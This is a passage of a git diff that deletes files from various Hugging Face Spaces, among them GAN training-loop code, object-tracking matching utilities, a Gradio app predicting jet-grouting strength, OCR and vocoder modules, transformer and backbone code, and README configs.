= [phase_gen_z.split(batch_gpu) for phase_gen_z in all_gen_z.split(batch_size)] - all_gen_c = [training_set.get_label(np.random.randint(len(training_set))) for _ in range(len(phases) * batch_size)] - all_gen_c = torch.from_numpy(np.stack(all_gen_c)).pin_memory().to(device) - all_gen_c = [phase_gen_c.split(batch_gpu) for phase_gen_c in all_gen_c.split(batch_size)] - - # Execute training phases. - for phase, phase_gen_z, phase_gen_c in zip(phases, all_gen_z, all_gen_c): - if batch_idx % phase.interval != 0: - continue - if phase.start_event is not None: - phase.start_event.record(torch.cuda.current_stream(device)) - - # Accumulate gradients. - phase.opt.zero_grad(set_to_none=True) - phase.module.requires_grad_(True) - for real_img, real_c, gen_z, gen_c in zip(phase_real_img, phase_real_c, phase_gen_z, phase_gen_c): - loss.accumulate_gradients(phase=phase.name, real_img=real_img, real_c=real_c, gen_z=gen_z, gen_c=gen_c, gain=phase.interval, cur_nimg=cur_nimg) - phase.module.requires_grad_(False) - - # Update weights. - with torch.autograd.profiler.record_function(phase.name + '_opt'): - params = [param for param in phase.module.parameters() if param.grad is not None] - if len(params) > 0: - flat = torch.cat([param.grad.flatten() for param in params]) - if num_gpus > 1: - torch.distributed.all_reduce(flat) - flat /= num_gpus - misc.nan_to_num(flat, nan=0, posinf=1e5, neginf=-1e5, out=flat) - grads = flat.split([param.numel() for param in params]) - for param, grad in zip(params, grads): - param.grad = grad.reshape(param.shape) - phase.opt.step() - - # Phase done. - if phase.end_event is not None: - phase.end_event.record(torch.cuda.current_stream(device)) - - # Update G_ema. - with torch.autograd.profiler.record_function('Gema'): - ema_nimg = ema_kimg * 1000 - if ema_rampup is not None: - ema_nimg = min(ema_nimg, cur_nimg * ema_rampup) - ema_beta = 0.5 ** (batch_size / max(ema_nimg, 1e-8)) - for p_ema, p in zip(G_ema.parameters(), G.parameters()): - p_ema.copy_(p.lerp(p_ema, ema_beta)) - for b_ema, b in zip(G_ema.buffers(), G.buffers()): - b_ema.copy_(b) - - # Update state. - cur_nimg += batch_size - batch_idx += 1 - - # Execute ADA heuristic. - if (ada_stats is not None) and (batch_idx % ada_interval == 0): - ada_stats.update() - adjust = np.sign(ada_stats['Loss/signs/real'] - ada_target) * (batch_size * ada_interval) / (ada_kimg * 1000) - augment_pipe.p.copy_((augment_pipe.p + adjust).max(misc.constant(0, device=device))) - - # Perform maintenance tasks once per tick. - done = (cur_nimg >= total_kimg * 1000) - if (not done) and (cur_tick != 0) and (cur_nimg < tick_start_nimg + kimg_per_tick * 1000): - continue - - # Print status line, accumulating the same information in training_stats. - tick_end_time = time.time() - fields = [] - fields += [f"tick {training_stats.report0('Progress/tick', cur_tick):<5d}"] - fields += [f"kimg {training_stats.report0('Progress/kimg', cur_nimg / 1e3):<8.1f}"] - fields += [f"time {dnnlib.util.format_time(training_stats.report0('Timing/total_sec', tick_end_time - start_time)):<12s}"] - fields += [f"sec/tick {training_stats.report0('Timing/sec_per_tick', tick_end_time - tick_start_time):<7.1f}"] - fields += [f"sec/kimg {training_stats.report0('Timing/sec_per_kimg', (tick_end_time - tick_start_time) / (cur_nimg - tick_start_nimg) * 1e3):<7.2f}"] - fields += [f"maintenance {training_stats.report0('Timing/maintenance_sec', maintenance_time):<6.1f}"] - fields += [f"cpumem {training_stats.report0('Resources/cpu_mem_gb', psutil.Process(os.getpid()).memory_info().rss / 2**30):<6.2f}"] - fields += [f"gpumem {training_stats.report0('Resources/peak_gpu_mem_gb', torch.cuda.max_memory_allocated(device) / 2**30):<6.2f}"] - fields += [f"reserved {training_stats.report0('Resources/peak_gpu_mem_reserved_gb', torch.cuda.max_memory_reserved(device) / 2**30):<6.2f}"] - torch.cuda.reset_peak_memory_stats() - fields += [f"augment {training_stats.report0('Progress/augment', float(augment_pipe.p.cpu()) if augment_pipe is not None else 0):.3f}"] - training_stats.report0('Timing/total_hours', (tick_end_time - start_time) / (60 * 60)) - training_stats.report0('Timing/total_days', (tick_end_time - start_time) / (24 * 60 * 60)) - if rank == 0: - print(' '.join(fields)) - - # Check for abort. - if (not done) and (abort_fn is not None) and abort_fn(): - done = True - if rank == 0: - print() - print('Aborting...') - - # Save image snapshot. - if (rank == 0) and (image_snapshot_ticks is not None) and (done or cur_tick % image_snapshot_ticks == 0): - images = torch.cat([G_ema(z=z, c=c, noise_mode='const').cpu() for z, c in zip(grid_z, grid_c)]).numpy() - save_image_grid(images, os.path.join(run_dir, f'fakes{cur_nimg//1000:06d}.png'), drange=[-1,1], grid_size=grid_size) - - # Save network snapshot. - snapshot_pkl = None - snapshot_data = None - if (network_snapshot_ticks is not None) and (done or cur_tick % network_snapshot_ticks == 0): - snapshot_data = dict(G=G, D=D, G_ema=G_ema, augment_pipe=augment_pipe, training_set_kwargs=dict(training_set_kwargs)) - for key, value in snapshot_data.items(): - if isinstance(value, torch.nn.Module): - value = copy.deepcopy(value).eval().requires_grad_(False) - if num_gpus > 1: - misc.check_ddp_consistency(value, ignore_regex=r'.*\.[^.]+_(avg|ema)') - for param in misc.params_and_buffers(value): - torch.distributed.broadcast(param, src=0) - snapshot_data[key] = value.cpu() - del value # conserve memory - snapshot_pkl = os.path.join(run_dir, f'network-snapshot-{cur_nimg//1000:06d}.pkl') - if rank == 0: - with open(snapshot_pkl, 'wb') as f: - pickle.dump(snapshot_data, f) - - # Evaluate metrics. - if (snapshot_data is not None) and (len(metrics) > 0): - if rank == 0: - print('Evaluating metrics...') - for metric in metrics: - result_dict = metric_main.calc_metric(metric=metric, G=snapshot_data['G_ema'], - dataset_kwargs=training_set_kwargs, num_gpus=num_gpus, rank=rank, device=device) - if rank == 0: - metric_main.report_metric(result_dict, run_dir=run_dir, snapshot_pkl=snapshot_pkl) - stats_metrics.update(result_dict.results) - del snapshot_data # conserve memory - - # Collect statistics. - for phase in phases: - value = [] - if (phase.start_event is not None) and (phase.end_event is not None): - phase.end_event.synchronize() - value = phase.start_event.elapsed_time(phase.end_event) - training_stats.report0('Timing/' + phase.name, value) - stats_collector.update() - stats_dict = stats_collector.as_dict() - - # Update logs. - timestamp = time.time() - if stats_jsonl is not None: - fields = dict(stats_dict, timestamp=timestamp) - stats_jsonl.write(json.dumps(fields) + '\n') - stats_jsonl.flush() - if stats_tfevents is not None: - global_step = int(cur_nimg / 1e3) - walltime = timestamp - start_time - for name, value in stats_dict.items(): - stats_tfevents.add_scalar(name, value.mean, global_step=global_step, walltime=walltime) - for name, value in stats_metrics.items(): - stats_tfevents.add_scalar(f'Metrics/{name}', value, global_step=global_step, walltime=walltime) - stats_tfevents.flush() - if progress_fn is not None: - progress_fn(cur_nimg // 1000, total_kimg) - - # Update state. - cur_tick += 1 - tick_start_nimg = cur_nimg - tick_start_time = time.time() - maintenance_time = tick_start_time - tick_end_time - if done: - break - - # Done. - if rank == 0: - print() - print('Exiting...') - -#---------------------------------------------------------------------------- diff --git a/spaces/ECCV2022/PARSeq-OCR/README.md b/spaces/ECCV2022/PARSeq-OCR/README.md deleted file mode 100644 index 25976e88ef1520b7bc736749f2f798f3caaedcc7..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/PARSeq-OCR/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: PARSeq OCR -emoji: 📚 -colorFrom: red -colorTo: purple -sdk: gradio -sdk_version: 3.1.3 -python_version: 3.9.13 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py b/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py deleted file mode 100644 index 01d07da874a793c06eecba172d1e44c7a368234b..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py +++ /dev/null @@ -1,116 +0,0 @@ -import cv2 -import numpy as np -import lap -from scipy.spatial.distance import cdist - -from cython_bbox import bbox_overlaps as bbox_ious -from yolox.motdt_tracker import kalman_filter - - -def _indices_to_matches(cost_matrix, indices, thresh): - matched_cost = cost_matrix[tuple(zip(*indices))] - matched_mask = (matched_cost <= thresh) - - matches = indices[matched_mask] - unmatched_a = tuple(set(range(cost_matrix.shape[0])) - set(matches[:, 0])) - unmatched_b = tuple(set(range(cost_matrix.shape[1])) - set(matches[:, 1])) - - return matches, unmatched_a, unmatched_b - - -def linear_assignment(cost_matrix, thresh): - if cost_matrix.size == 0: - return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) - matches, unmatched_a, unmatched_b = [], [], [] - cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) - for ix, mx in enumerate(x): - if mx >= 0: - matches.append([ix, mx]) - unmatched_a = np.where(x < 0)[0] - unmatched_b = np.where(y < 0)[0] - matches = np.asarray(matches) - return matches, unmatched_a, unmatched_b - - -def ious(atlbrs, btlbrs): - """ - Compute cost based on IoU - :type atlbrs: list[tlbr] | np.ndarray - :type atlbrs: list[tlbr] | np.ndarray - :rtype ious np.ndarray - """ - ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float) - if ious.size == 0: - return ious - - ious = bbox_ious( - np.ascontiguousarray(atlbrs, dtype=np.float), - np.ascontiguousarray(btlbrs, dtype=np.float) - ) - - return ious - - -def iou_distance(atracks, btracks): - """ - Compute cost based on IoU - :type atracks: list[STrack] - :type btracks: list[STrack] - :rtype cost_matrix np.ndarray - """ - atlbrs = [track.tlbr for track in atracks] - btlbrs = [track.tlbr for track in btracks] - _ious = ious(atlbrs, btlbrs) - cost_matrix = 1 - _ious - - return cost_matrix - - -def nearest_reid_distance(tracks, detections, metric='cosine'): - """ - Compute cost based on ReID features - :type tracks: list[STrack] - :type detections: list[BaseTrack] - :rtype cost_matrix np.ndarray - """ - cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float) - if cost_matrix.size == 0: - return cost_matrix - - det_features = np.asarray([track.curr_feature for track in detections], dtype=np.float32) - for i, track in enumerate(tracks): - cost_matrix[i, :] = np.maximum(0.0, cdist(track.features, det_features, metric).min(axis=0)) - - return cost_matrix - - -def mean_reid_distance(tracks, detections, metric='cosine'): - """ - Compute cost based on ReID features - :type tracks: list[STrack] - :type detections: list[BaseTrack] - :type metric: str - :rtype cost_matrix np.ndarray - """ - cost_matrix = np.empty((len(tracks), len(detections)), dtype=np.float) - if cost_matrix.size == 0: - return cost_matrix - - track_features = np.asarray([track.curr_feature for track in tracks], dtype=np.float32) - det_features = np.asarray([track.curr_feature for track in detections], dtype=np.float32) - cost_matrix = cdist(track_features, det_features, metric) - - return cost_matrix - - -def gate_cost_matrix(kf, cost_matrix, tracks, detections, only_position=False): - if cost_matrix.size == 0: - return cost_matrix - gating_dim = 2 if only_position else 4 - gating_threshold = kalman_filter.chi2inv95[gating_dim] - measurements = np.asarray([det.to_xyah() for det in detections]) - for row, track in enumerate(tracks): - gating_distance = kf.gating_distance( - track.mean, track.covariance, measurements, only_position) - cost_matrix[row, gating_distance > gating_threshold] = np.inf - return cost_matrix \ No newline at end of file diff --git a/spaces/EstebanDC/UCS_JG/app.py b/spaces/EstebanDC/UCS_JG/app.py deleted file mode 100644 index aed3bceed71e1a8b53f3443a8842cadfc537889b..0000000000000000000000000000000000000000 --- a/spaces/EstebanDC/UCS_JG/app.py +++ /dev/null @@ -1,65 +0,0 @@ -import pickle -import numpy as np -import gradio as gr -import sklearn -import pandas as pd -from sklearn.model_selection import train_test_split -from sklearn.ensemble import ExtraTreesRegressor - -filename = 'Dataset_RCS_3.csv' -names0 = ['JET', "Suelo",'SPT', 'WtoC', 'Presion', 'Velocidad','RCS'] -dataset=pd.read_csv(filename, names=names0) - -y = dataset['RCS'] -X = dataset.drop('RCS', axis=1) - -validation_size = 0.20 -seed = 10 -X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=validation_size, random_state=seed) - - -modelodef=ExtraTreesRegressor( - n_estimators=1000, - max_depth=9, - min_samples_leaf=1, - random_state=seed) -modelodef.fit(X_train, y_train) - -pickle.dump(modelodef, open("modelodef.pkl", "wb")) - - -def RCS(JET, Suelo,SPT, WtoC, Presion, Velocidad): - modelodef = pickle.load(open("modelodef.pkl", "rb")) - prediction0 = modelodef.predict([[JET, Suelo,SPT, WtoC, Presion, Velocidad]]) - prediction = np.round(prediction0,2) - return prediction - -title = "ASSESSMENT OF UNIAXIAL COMPRESSIVE STRENGTH OF JET GROUTING" -description = "This app corresponds to the research paper: Assessment of compressive strength of jet grouting by machine learning" -article = """ - Notes: - - Click submit/enviar button to obtain the UCS prediction - - Click clear/limpiar button to refresh text - - Please note the application ranges of the variables in the above-referenced paper (https://doi.org/10.1016/j.jrmge.2023.03.008). Outside these ranges, the predictions may not be reliable - - As a decimal separator you can use either a point or a comma - """ - -app = gr.Interface( - RCS, - inputs=[ - gr.Radio(['1', '2', '3'], label="Jet system. 1: Single. 2: Double. 3: Triple",value="1"), - gr.Radio(['1', '2', '3', '4'], label="Soil type. 1: Coarse without fines. 2: Coarse with fines. 3: Fine. 4: Organic",value="1"), - gr.Number(value=1, label="Nspt"), - gr.Number(value=1, label="W/C"), - gr.Number(value=1, label="Grout pressure (MPa)"), - gr.Number(value=1, label="Rotation speed (rpm)"), - - ], - outputs=[gr.Text(label="UCS (MPa)")], - title=title, - description=description, - article = article, - theme="dark-seafoam" -) - -app.launch() \ No newline at end of file diff --git a/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py b/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py deleted file mode 100644 index 40688d1290080c010beccc271214e5b246b45a32..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py +++ /dev/null @@ -1,30 +0,0 @@ -_base_ = [ - '../../_base_/default_runtime.py', '../../_base_/recog_models/sar.py', - '../../_base_/schedules/schedule_adam_step_5e.py', - '../../_base_/recog_pipelines/sar_pipeline.py', - '../../_base_/recog_datasets/toy_data.py' -] - -train_list = {{_base_.train_list}} -test_list = {{_base_.test_list}} - -train_pipeline = {{_base_.train_pipeline}} -test_pipeline = {{_base_.test_pipeline}} - -data = dict( - workers_per_gpu=2, - samples_per_gpu=8, - train=dict( - type='UniformConcatDataset', - datasets=train_list, - pipeline=train_pipeline), - val=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline), - test=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline)) - -evaluation = dict(interval=1, metric='acc') diff --git a/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts b/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts deleted file mode 100644 index 1802fcc4255db54bc72b491e9ab4e125d75b2562..0000000000000000000000000000000000000000 --- a/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts +++ /dev/null @@ -1,4 +0,0 @@ -const urlParams = new URLSearchParams(window.location.search); -export const debug = urlParams.has("debug"); -export const query = urlParams.get("q"); -export const disableWorkers = urlParams.has("disableWorkers"); diff --git a/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py b/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py deleted file mode 100644 index bbaa47f64fd5a3191a24dfaa054c423fa86e5bae..0000000000000000000000000000000000000000 --- a/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py +++ /dev/null @@ -1,94 +0,0 @@ -import torch -from vdecoder.nsf_hifigan.nvSTFT import STFT -from vdecoder.nsf_hifigan.models import load_model,load_config -from torchaudio.transforms import Resample - - -class Vocoder: - def __init__(self, vocoder_type, vocoder_ckpt, device = None): - if device is None: - device = 'cuda' if torch.cuda.is_available() else 'cpu' - self.device = device - - if vocoder_type == 'nsf-hifigan': - self.vocoder = NsfHifiGAN(vocoder_ckpt, device = device) - elif vocoder_type == 'nsf-hifigan-log10': - self.vocoder = NsfHifiGANLog10(vocoder_ckpt, device = device) - else: - raise ValueError(f" [x] Unknown vocoder: {vocoder_type}") - - self.resample_kernel = {} - self.vocoder_sample_rate = self.vocoder.sample_rate() - self.vocoder_hop_size = self.vocoder.hop_size() - self.dimension = self.vocoder.dimension() - - def extract(self, audio, sample_rate, keyshift=0): - - # resample - if sample_rate == self.vocoder_sample_rate: - audio_res = audio - else: - key_str = str(sample_rate) - if key_str not in self.resample_kernel: - self.resample_kernel[key_str] = Resample(sample_rate, self.vocoder_sample_rate, lowpass_filter_width = 128).to(self.device) - audio_res = self.resample_kernel[key_str](audio) - - # extract - mel = self.vocoder.extract(audio_res, keyshift=keyshift) # B, n_frames, bins - return mel - - def infer(self, mel, f0): - f0 = f0[:,:mel.size(1),0] # B, n_frames - audio = self.vocoder(mel, f0) - return audio - - -class NsfHifiGAN(torch.nn.Module): - def __init__(self, model_path, device=None): - super().__init__() - if device is None: - device = 'cuda' if torch.cuda.is_available() else 'cpu' - self.device = device - self.model_path = model_path - self.model = None - self.h = load_config(model_path) - self.stft = STFT( - self.h.sampling_rate, - self.h.num_mels, - self.h.n_fft, - self.h.win_size, - self.h.hop_size, - self.h.fmin, - self.h.fmax) - - def sample_rate(self): - return self.h.sampling_rate - - def hop_size(self): - return self.h.hop_size - - def dimension(self): - return self.h.num_mels - - def extract(self, audio, keyshift=0): - mel = self.stft.get_mel(audio, keyshift=keyshift).transpose(1, 2) # B, n_frames, bins - return mel - - def forward(self, mel, f0): - if self.model is None: - print('| Load HifiGAN: ', self.model_path) - self.model, self.h = load_model(self.model_path, device=self.device) - with torch.no_grad(): - c = mel.transpose(1, 2) - audio = self.model(c, f0) - return audio - -class NsfHifiGANLog10(NsfHifiGAN): - def forward(self, mel, f0): - if self.model is None: - print('| Load HifiGAN: ', self.model_path) - self.model, self.h = load_model(self.model_path, device=self.device) - with torch.no_grad(): - c = 0.434294 * mel.transpose(1, 2) - audio = self.model(c, f0) - return audio \ No newline at end of file diff --git a/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py b/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py deleted file mode 100644 index 5dfff440b489f3cc3c62450dc28c2f35f692dd94..0000000000000000000000000000000000000000 --- a/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py +++ /dev/null @@ -1,130 +0,0 @@ -""" -Transformer implementation adapted from CLIP ViT: -https://github.com/openai/CLIP/blob/4c0275784d6d9da97ca1f47eaaee31de1867da91/clip/model.py -""" - -import math - -import torch as th -import torch.nn as nn - - -def convert_module_to_f16(l): - """ - Convert primitive modules to float16. - """ - if isinstance(l, (nn.Linear, nn.Conv2d, nn.ConvTranspose2d)): - l.weight.data = l.weight.data.half() - if l.bias is not None: - l.bias.data = l.bias.data.half() - - -class LayerNorm(nn.LayerNorm): - """ - Implementation that supports fp16 inputs but fp32 gains/biases. - """ - - def forward(self, x: th.Tensor): - return super().forward(x.float()).to(x.dtype) - - -class MultiheadAttention(nn.Module): - def __init__(self, n_ctx, width, heads): - super().__init__() - self.n_ctx = n_ctx - self.width = width - self.heads = heads - self.c_qkv = nn.Linear(width, width * 3) - self.c_proj = nn.Linear(width, width) - self.attention = QKVMultiheadAttention(heads, n_ctx) - - def forward(self, x): - x = self.c_qkv(x) - x = self.attention(x) - x = self.c_proj(x) - return x - - -class MLP(nn.Module): - def __init__(self, width): - super().__init__() - self.width = width - self.c_fc = nn.Linear(width, width * 4) - self.c_proj = nn.Linear(width * 4, width) - self.gelu = nn.GELU() - - def forward(self, x): - return self.c_proj(self.gelu(self.c_fc(x))) - - -class QKVMultiheadAttention(nn.Module): - def __init__(self, n_heads: int, n_ctx: int): - super().__init__() - self.n_heads = n_heads - self.n_ctx = n_ctx - - def forward(self, qkv): - bs, n_ctx, width = qkv.shape - attn_ch = width // self.n_heads // 3 - scale = 1 / math.sqrt(math.sqrt(attn_ch)) - qkv = qkv.view(bs, n_ctx, self.n_heads, -1) - q, k, v = th.split(qkv, attn_ch, dim=-1) - weight = th.einsum( - "bthc,bshc->bhts", q * scale, k * scale - ) # More stable with f16 than dividing afterwards - wdtype = weight.dtype - weight = th.softmax(weight.float(), dim=-1).type(wdtype) - return th.einsum("bhts,bshc->bthc", weight, v).reshape(bs, n_ctx, -1) - - -class ResidualAttentionBlock(nn.Module): - def __init__( - self, - n_ctx: int, - width: int, - heads: int, - ): - super().__init__() - - self.attn = MultiheadAttention( - n_ctx, - width, - heads, - ) - self.ln_1 = LayerNorm(width) - self.mlp = MLP(width) - self.ln_2 = LayerNorm(width) - - def forward(self, x: th.Tensor): - x = x + self.attn(self.ln_1(x)) - x = x + self.mlp(self.ln_2(x)) - return x - - -class Transformer(nn.Module): - def __init__( - self, - n_ctx: int, - width: int, - layers: int, - heads: int, - ): - super().__init__() - self.n_ctx = n_ctx - self.width = width - self.layers = layers - self.resblocks = nn.ModuleList( - [ - ResidualAttentionBlock( - n_ctx, - width, - heads, - ) - for _ in range(layers) - ] - ) - - def forward(self, x: th.Tensor): - for block in self.resblocks: - x = block(x) - return x diff --git a/spaces/Fuyuka29/Anime_Background_Remover/README.md b/spaces/Fuyuka29/Anime_Background_Remover/README.md deleted file mode 100644 index 1ba3cb5ea0e994e246d57b7d62b8aa5a6331901c..0000000000000000000000000000000000000000 --- a/spaces/Fuyuka29/Anime_Background_Remover/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Anime Remove Background -emoji: 🪄🖼️ -colorFrom: indigo -colorTo: pink -sdk: gradio -sdk_version: 3.1.4 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: skytnt/anime-remove-background ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/GXSA/bingo/src/app/layout.tsx b/spaces/GXSA/bingo/src/app/layout.tsx deleted file mode 100644 index 8b5122759987177b8dc4e4356d1d06cea25c15ea..0000000000000000000000000000000000000000 --- a/spaces/GXSA/bingo/src/app/layout.tsx +++ /dev/null @@ -1,47 +0,0 @@ -import { Metadata } from 'next' -import { Toaster } from 'react-hot-toast' -import { TailwindIndicator } from '@/components/tailwind-indicator' -import { Providers } from '@/components/providers' -import { Header } from '@/components/header' - -import '@/app/globals.scss' - - -export const metadata: Metadata = { - title: { - default: 'Bing AI Chatbot', - template: `%s - Bing AI Chatbot` - }, - description: 'Bing AI Chatbot Web App.', - themeColor: [ - { media: '(prefers-color-scheme: light)', color: 'white' }, - { media: '(prefers-color-scheme: dark)', color: 'dark' } - ], - icons: { - icon: '/favicon.ico', - shortcut: '../assets/images/logo.svg', - apple: '../assets/images/logo.svg' - } -} - -interface RootLayoutProps { - children: React.ReactNode -} - -export default function RootLayout({ children }: RootLayoutProps) { - return ( - - - - -
    - {/* @ts-ignore */} -
    -
    {children}
    -
    - -
    - - - ) -} diff --git a/spaces/Gallifraid/prompthero-openjourney-v2/app.py b/spaces/Gallifraid/prompthero-openjourney-v2/app.py deleted file mode 100644 index 4fa45eda1d4a0af263ec59b35e375b837fe1ecf1..0000000000000000000000000000000000000000 --- a/spaces/Gallifraid/prompthero-openjourney-v2/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/prompthero/openjourney-v2").launch() \ No newline at end of file diff --git a/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py b/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py deleted file mode 100644 index 9b99b145d2c84444771045ad74992d0bf360f39b..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py +++ /dev/null @@ -1,162 +0,0 @@ -# Copyright (c) Aishwarya Kamath & Nicolas Carion. Licensed under the Apache License 2.0. All Rights Reserved -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -""" -Backbone modules. -""" -from collections import OrderedDict - -import torch -import torch.nn.functional as F -import torchvision -from timm.models import create_model -from torch import nn -from torchvision.models._utils import IntermediateLayerGetter - -from cliport.models.misc import NestedTensor - - - -class FrozenBatchNorm2d(torch.nn.Module): - """ - BatchNorm2d where the batch statistics and the affine parameters are fixed. - - Copy-paste from torchvision.misc.ops with added eps before rqsrt, - without which any other models than torchvision.models.resnet[18,34,50,101] - produce nans. - """ - - def __init__(self, n): - super(FrozenBatchNorm2d, self).__init__() - self.register_buffer("weight", torch.ones(n)) - self.register_buffer("bias", torch.zeros(n)) - self.register_buffer("running_mean", torch.zeros(n)) - self.register_buffer("running_var", torch.ones(n)) - - def _load_from_state_dict( - self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ): - num_batches_tracked_key = prefix + "num_batches_tracked" - if num_batches_tracked_key in state_dict: - del state_dict[num_batches_tracked_key] - - super(FrozenBatchNorm2d, self)._load_from_state_dict( - state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ) - - def forward(self, x): - # move reshapes to the beginning - # to make it fuser-friendly - w = self.weight.reshape(1, -1, 1, 1) - b = self.bias.reshape(1, -1, 1, 1) - rv = self.running_var.reshape(1, -1, 1, 1) - rm = self.running_mean.reshape(1, -1, 1, 1) - eps = 1e-5 - scale = w * (rv + eps).rsqrt() - bias = b - rm * scale - return x * scale + bias - - -class BackboneBase(nn.Module): - def __init__(self, backbone: nn.Module, train_backbone: bool, num_channels: int, return_interm_layers: bool): - super().__init__() - for name, parameter in backbone.named_parameters(): - if not train_backbone or "layer2" not in name and "layer3" not in name and "layer4" not in name: - parameter.requires_grad_(False) - if return_interm_layers: - return_layers = {"layer1": "0", "layer2": "1", "layer3": "2", "layer4": "3"} - else: - return_layers = {"layer4": 0} - self.body = IntermediateLayerGetter(backbone, return_layers=return_layers) - self.num_channels = num_channels - - def forward(self, tensor_list): - xs = self.body(tensor_list.tensors) - out = OrderedDict() - for name, x in xs.items(): - mask = F.interpolate(tensor_list.mask[None].float(), size=x.shape[-2:]).bool()[0] - out[name] = NestedTensor(x, mask) - return out - - -class Backbone(BackboneBase): - """ResNet backbone with frozen BatchNorm.""" - - def __init__(self, name: str, train_backbone: bool, return_interm_layers: bool, dilation: bool): - backbone = getattr(torchvision.models, name)( - replace_stride_with_dilation=[False, False, dilation], pretrained=False, norm_layer=FrozenBatchNorm2d - ) - num_channels = 512 if name in ("resnet18", "resnet34") else 2048 - super().__init__(backbone, train_backbone, num_channels, return_interm_layers) - - -class GroupNorm32(torch.nn.GroupNorm): - def __init__(self, num_channels, num_groups=32, **kargs): - super().__init__(num_groups, num_channels, **kargs) - - -class GroupNormBackbone(BackboneBase): - """ResNet backbone with GroupNorm with 32 channels.""" - - def __init__(self, name: str, train_backbone: bool, return_interm_layers: bool, dilation: bool): - name_map = { - "resnet50-gn": ("resnet50", "/checkpoint/szagoruyko/imagenet/22014122/checkpoint.pth"), - "resnet101-gn": ("resnet101", "/checkpoint/szagoruyko/imagenet/22080524/checkpoint.pth"), - } - backbone = getattr(torchvision.models, name_map[name][0])( - replace_stride_with_dilation=[False, False, dilation], pretrained=False, norm_layer=GroupNorm32 - ) - checkpoint = torch.load(name_map[name][1], map_location="cpu") - state_dict = {k[7:]: p for k, p in checkpoint["model"].items()} - backbone.load_state_dict(state_dict) - num_channels = 512 if name_map[name][0] in ("resnet18", "resnet34") else 2048 - super().__init__(backbone, train_backbone, num_channels, return_interm_layers) - - -def replace_bn(m, name=""): - for attr_str in dir(m): - target_attr = getattr(m, attr_str) - if isinstance(target_attr, torch.nn.BatchNorm2d): - frozen = FrozenBatchNorm2d(target_attr.num_features) - bn = getattr(m, attr_str) - frozen.weight.data.copy_(bn.weight) - frozen.bias.data.copy_(bn.bias) - frozen.running_mean.data.copy_(bn.running_mean) - frozen.running_var.data.copy_(bn.running_var) - setattr(m, attr_str, frozen) - for n, ch in m.named_children(): - replace_bn(ch, n) - - -class GN_8(nn.Module): - def __init__(self, num_channels): - super().__init__() - self.gn = torch.nn.GroupNorm(8, num_channels) - - def forward(self, x): - return self.gn(x) - - -class TimmBackbone(nn.Module): - def __init__(self, name, return_interm_layers, main_layer=-1, group_norm=False): - super().__init__() - backbone = create_model(name, pretrained=True, in_chans=3, features_only=True, out_indices=(1, 2, 3, 4)) - - with torch.no_grad(): - replace_bn(backbone) - num_channels = backbone.feature_info.channels()[-1] - self.body = backbone - self.num_channels = num_channels - self.interm = return_interm_layers - self.main_layer = main_layer - - def forward(self, tensor_list): - xs = self.body(tensor_list.tensors) - if not self.interm: - xs = [xs[self.main_layer]] - out = OrderedDict() - for i, x in enumerate(xs): - mask = F.interpolate(tensor_list.mask[None].float(), size=x.shape[-2:]).bool()[0] - out[f"layer{i}"] = NestedTensor(x, mask) - return out - - diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py deleted file mode 100644 index 49ab539aa4cdf7c396b6f109efe2dc7a6d596a2a..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = [ - '../_base_/models/cascade_mask_rcnn_r50_fpn.py', - '../_base_/datasets/coco_instance.py', - '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py' -] diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py deleted file mode 100644 index 